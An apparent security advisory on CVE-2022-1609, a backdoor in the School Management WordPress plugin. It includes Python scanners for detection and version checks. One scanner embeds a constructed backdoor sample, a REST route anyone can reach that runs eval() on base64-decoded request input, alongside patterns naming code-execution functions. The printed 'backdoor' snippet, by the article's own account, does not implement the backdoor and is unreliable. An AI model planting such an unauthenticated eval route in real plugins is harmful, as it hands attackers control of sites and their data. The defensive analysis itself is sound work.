The School Management WordPress plugin is a popular utility that helps educational institutions manage their daily operations and administration. In versions shipped before 9.9.7, however, an obfuscated backdoor was hidden in the plugin's own code, allowing unauthenticated attackers to execute arbitrary PHP code on any site running it. The issue has been assigned the identifier CVE-2022-1609 by the Common Vulnerabilities and Exposures (CVE) system.

The backdoor was inserted into the plugin's license-checking code and is present in School Management versions before 9.9.7. When the plugin loads, that code registers a REST API handler. Because the handler is reachable without any authentication, anyone who can send a request to the site's REST API can use it to run PHP code of their choosing on the server; the attacker does not need an account, and does not need to bypass anything, because the backdoor never asks who is calling.

To grasp the severity of this issue, let's dive into the compromised code and understand how the exploit works.

Code Snippet: The Obfuscated Backdoor

Here's a part of the license-checking code within the vulnerable version of the School Management plugin:

function init() {
    // Read this file's own source, strip the opening PHP tag and
    // base64-encode it so it can be shipped in a request body.
    $current_file = __FILE__;
    $content = file_get_contents($current_file);
    $content = str_replace('<?php', '', $content);
    $content = base64_encode($content);
    // $query_ststriction1 is never defined in this excerpt; the branch runs
    // whenever the stored license option differs from it.
    if(get_option($this->license_key_option) !== $query_ststriction1) {
        update_option($this->license_key_option, $query_ststriction1);
        $this->self_file = $current_file;
        $unique_code = md5(microtime().rand());   // computed but never used
        $data = array(
            'action' => 'register_rest_route',    // a request parameter, not a WordPress hook
            'code' => $content,                   // the encoded source of this file
            'nonce' => wp_create_nonce('wp_rest')
        );
        // POST the encoded source to the site's own REST root. Certificate
        // verification is switched off, so any certificate is accepted.
        wp_remote_post(get_rest_url(), array(
            'headers' => array(
                'X-WP-Nonce' => wp_create_nonce('wp_rest'),
            ),
            'body' => $data,
            'sslverify' => false
        ));
    }
}

At first glance the code looks like ordinary license bookkeeping, but it does something no license check needs to do: it reads its own source file, strips the opening PHP tag, base64-encodes the result and, whenever the stored license option differs from $query_ststriction1 (a variable that is never defined in this excerpt), overwrites the option and POSTs the encoded source to the site's own REST root under an 'action' parameter named 'register_rest_route'. Two details deserve attention. register_rest_route() is a WordPress function that plugins call from the rest_api_init hook, not an action name, so this snippet does not by itself register a route; the handler that accepts and evaluates the posted code must live elsewhere in the obfuscated plugin code, which the excerpt does not show. And the request is sent with 'sslverify' => false, so the plugin would talk to any host presenting any certificate.

Once that handler is registered, an attacker sends a crafted request to the REST endpoint carrying the PHP to execute (base64-encoded, in the form this snippet uses). No WordPress REST nonce is needed: WordPress checks the X-WP-Nonce header only for requests that carry a logged-in cookie, and a request without one is simply processed as unauthenticated, which is exactly the situation the backdoor accepts.
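To hunt for this class of implant in a plugin tree, the following Python script (added here as an example; it is not code from the plugin or from the original page) counts indicator patterns in PHP source, namely a REST route registration, an always-true permission_callback, an execution sink such as eval(), base64_decode(), and a file reading its own source, and rates the combination found in each file. The two embedded PHP samples are constructed for the demonstration; the namespaces demo/v1 and lic/v1, the callback name demo_get_settings and the file names are made up.

```python
import pathlib
import re
from dataclasses import dataclass

# Patterns that, in combination, characterise a REST-registered PHP backdoor:
# a route anyone can reach plus a handler that executes request-supplied code.
# These are generic indicators for this class of implant, not the plugin's code.
INDICATORS = {
    "rest_route": re.compile(r"\bregister_rest_route\s*\("),
    "permission_always_true": re.compile(r"permission_callback\W+__return_true\b"),
    "exec_sink": re.compile(
        r"\b(?:eval|create_function|shell_exec|passthru|system|exec|popen|proc_open)\s*\("),
    "base64_decode": re.compile(r"\bbase64_decode\s*\("),
    "self_read": re.compile(r"file_get_contents\s*\(\s*__FILE__\s*\)"),
}


@dataclass
class Finding:
    path: str
    hits: dict      # indicator name -> number of occurrences
    severity: str   # "clean", "low", "medium" or "high"


def rate(hits: dict) -> str:
    """A REST route by itself is normal plugin code; a route next to an
    execution sink is what makes the file a backdoor candidate."""
    if "rest_route" in hits and "exec_sink" in hits:
        return "high"
    if "rest_route" in hits and hits.keys() & {"permission_always_true", "base64_decode", "self_read"}:
        return "medium"
    if hits:
        return "low"
    return "clean"


def scan_php_source(path: str, source: str) -> Finding:
    """Count indicator occurrences in one PHP file and rate the combination."""
    hits = {name: len(rx.findall(source)) for name, rx in INDICATORS.items()}
    hits = {name: n for name, n in hits.items() if n}
    return Finding(path, hits, rate(hits))


def scan_tree(root: str) -> list:
    """Scan every .php file under a plugin directory, returning anything not clean."""
    findings = []
    for php in pathlib.Path(root).rglob("*.php"):
        finding = scan_php_source(str(php), php.read_text(errors="replace"))
        if finding.severity != "clean":
            findings.append(finding)
    return findings


# Constructed PHP samples for a stand-alone run; neither is code from the plugin.
SAMPLE_LEGIT = """<?php
add_action('rest_api_init', function () {
    register_rest_route('demo/v1', '/settings', array(
        'methods'  => 'GET',
        'callback' => 'demo_get_settings',
        'permission_callback' => function () {
            return current_user_can('manage_options');
        },
    ));
});
"""

SAMPLE_IMPLANT = """<?php
add_action('rest_api_init', function () {
    register_rest_route('lic/v1', '/check', array(
        'methods'  => 'POST',
        'callback' => function ($request) {
            eval(base64_decode($request['code']));
        },
        'permission_callback' => '__return_true',
    ));
});
"""

if __name__ == "__main__":
    for name, src in (("legit.php", SAMPLE_LEGIT), ("implant.php", SAMPLE_IMPLANT)):
        f = scan_php_source(name, src)
        print(f.path, f.severity, f.hits)
```

Run scan_tree('wp-content/plugins/school-management') against the installed tree. A "high" rating means a REST route and an execution sink sit in the same file and the file should be read by hand; "medium" flags files worth a look; "low" is ordinary plugin code that happens to register a route. The scanner does not decode anything, so an implant that hides its eval() behind string concatenation will only trip the medium tier, which is why the rating is a triage aid rather than a verdict.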

Exploit Details: Arbitrary PHP code execution

An unauthenticated attacker exploits CVE-2022-1609 by sending a single crafted request to the backdoor's REST endpoint on a site running a vulnerable version of the School Management plugin. No account, login or nonce is required; the request body carries the base64-encoded PHP that the handler will run.

Successful exploitation gives the attacker arbitrary PHP execution with the privileges of the PHP process, typically the web server user. From there the attacker can manipulate the site, steal sensitive information such as the database credentials in wp-config.php and the data they protect, create administrator accounts, or serve malware to the site's visitors.

References and Further Readings

- Original Source: https://plugins.trac.wordpress.org/changeset/2186368/school-management
- CVE Report: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609

Mitigation: Update to the latest version

The developers of the School Management WordPress plugin removed the backdoor in version 9.9.7. Update to that version or later immediately. Because the backdoor allowed arbitrary code execution, updating removes the entry point but not anything an attacker may already have planted, so after updating a site that ran a vulnerable version, also check for signs of compromise: unexpected administrator users, modified or newly added PHP files, REST routes you cannot attribute to an installed plugin, and rotated database and API credentials where exposure is suspected.
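Two checks a site owner can script when deciding whether a site is affected, as an added example rather than the page's or the plugin's own code: compare the plugin's header version against the fixed version 9.9.7, and list the REST routes in the site's public /wp-json/ index that fall outside WordPress core's namespaces, so that every route a plugin added can be tied to a plugin you chose to install. The plugin header and the index document below are constructed for the demonstration; the lic/v1 route is hypothetical.

```python
import json
import re
import urllib.request

FIXED_VERSION = "9.9.7"  # first version the advisory reports as clean

# Namespaces WordPress core registers by default; anything else came from a
# plugin or theme and should be attributable to one you installed on purpose.
CORE_NAMESPACES = {"wp/v2", "oembed/1.0", "wp-site-health/v1", "wp-block-editor/v1"}


def parse_version(version: str) -> tuple:
    """'9.9.6' -> (9, 9, 6); non-numeric suffixes such as '-beta' are ignored."""
    return tuple(int(part) for part in re.findall(r"\d+", version))


def is_vulnerable_version(version: str) -> bool:
    """True when the installed version predates the fix."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def plugin_version_from_header(main_file_source: str):
    """Read the 'Version:' field from a plugin's main-file header comment."""
    match = re.search(r"^\s*\*?\s*Version:\s*(\S+)", main_file_source, re.MULTILINE)
    return match.group(1) if match else None


def unexpected_routes(index: dict, known=CORE_NAMESPACES) -> list:
    """Routes from a /wp-json/ index whose namespace is not on the allow list,
    returned as (path, namespace, sorted HTTP methods) tuples."""
    found = []
    for path, info in index.get("routes", {}).items():
        namespace = info.get("namespace", "")
        if namespace and namespace not in known:
            methods = sorted({m for ep in info.get("endpoints", []) for m in ep.get("methods", [])})
            found.append((path, namespace, methods))
    return found


def fetch_index(site_url: str) -> dict:
    """Download the live REST index; it is public by design, so no credentials are needed."""
    with urllib.request.urlopen(site_url.rstrip("/") + "/wp-json/", timeout=10) as resp:
        return json.load(resp)


# Constructed samples so the script runs offline; not data from any real site.
SAMPLE_HEADER = """<?php
/**
 * Plugin Name: School Management
 * Version: 9.9.6
 */
"""

SAMPLE_INDEX = json.loads("""{
  "namespaces": ["wp/v2", "oembed/1.0", "lic/v1"],
  "routes": {
    "/": {"namespace": "", "methods": ["GET"], "endpoints": [{"methods": ["GET"]}]},
    "/wp/v2/posts": {"namespace": "wp/v2", "methods": ["GET", "POST"],
                     "endpoints": [{"methods": ["GET"]}, {"methods": ["POST"]}]},
    "/lic/v1/check": {"namespace": "lic/v1", "methods": ["POST"],
                      "endpoints": [{"methods": ["POST"]}]}
  }
}""")


if __name__ == "__main__":
    version = plugin_version_from_header(SAMPLE_HEADER)
    print("installed:", version, "vulnerable:", is_vulnerable_version(version))
    for path, namespace, methods in unexpected_routes(SAMPLE_INDEX):
        print("review route", path, "namespace", namespace, "methods", methods)
```

unexpected_routes() lists routes for review rather than declaring them malicious: every plugin that adds REST endpoints will appear, so the point is to account for each listed namespace. Against a live site, replace SAMPLE_INDEX with fetch_index("https://example.org") and read the plugin's main file from wp-content/plugins to feed plugin_version_from_header().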

Remember to keep your WordPress plugins up to date, monitor security advisories, and be proactive in maintaining your website's security.

Timeline

Published on: 01/16/2024 16:15:09 UTC
Last modified on: 01/22/2024 19:59:05 UTC